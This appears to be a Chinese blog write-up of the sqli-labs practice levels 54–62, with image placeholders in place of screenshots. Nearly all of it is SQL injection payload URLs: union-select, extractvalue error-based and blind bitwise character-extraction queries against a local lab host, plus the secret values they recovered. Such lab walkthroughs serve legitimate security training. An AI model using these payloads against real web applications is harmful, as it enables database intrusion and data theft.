Sql-labs-page4

less-54

查库

图片.png

查表

图片.png

查字段

图片.png

爆数据

图片.png

less-55

本关与 less-54 差不多多了个）闭合

图片.png

查表

图片.png

less-56

http://192.168.211.145/sqli/Less-56/index.php?id=1')%23 //成功闭合

less-57

http://192.168.211.145/sqli/Less-57/?id=-1" union select 1,database(),3%23

less-58

图片.png

使用extractvalue()函数报错注入

图片.png

查表

图片.png

查字段

图片.png

less-59

图片.png

less-58
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
所以
?id=1 and extractvalue(1,concat(0x7e,(select database())))%23

less-60

与上一关的区别在于
$id = '("'.$id.'")';
攻击payload如下
http://192.168.211.145/sqli/Less-60/?id=1") and extractvalue(1, concat(0x5c, (select database())))%23

less-61

http://192.168.211.145/sqli/Less-61/?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

less-62

ord()函数
ord() 函数返回字符串的首个字符的 ASCII 值。
Solution：

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+

//表名第一个字符：w

// wlo99z7cua

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+

//10110 = 22 ，列名中倒数第四个字符：V

// secret_VUBV

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+

https://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+

// key 的第一个字符：1

// 1kqTprKdfAt6VGFEoEcpYgjG

注：随机值

表名 10位由小写字母和数字组成

secret_XXXX 后四位由大写字母和数字组成

key 24位由大小写字母和数字组成

less-62-less65详解

less-54-less-65

Sql-labs-page4

less-54

less-55

less-56

less-57

less-58

less-59

less-60

less-61

less-62

less-62-less65详解

你可能感兴趣的:(Sql-labs-page4)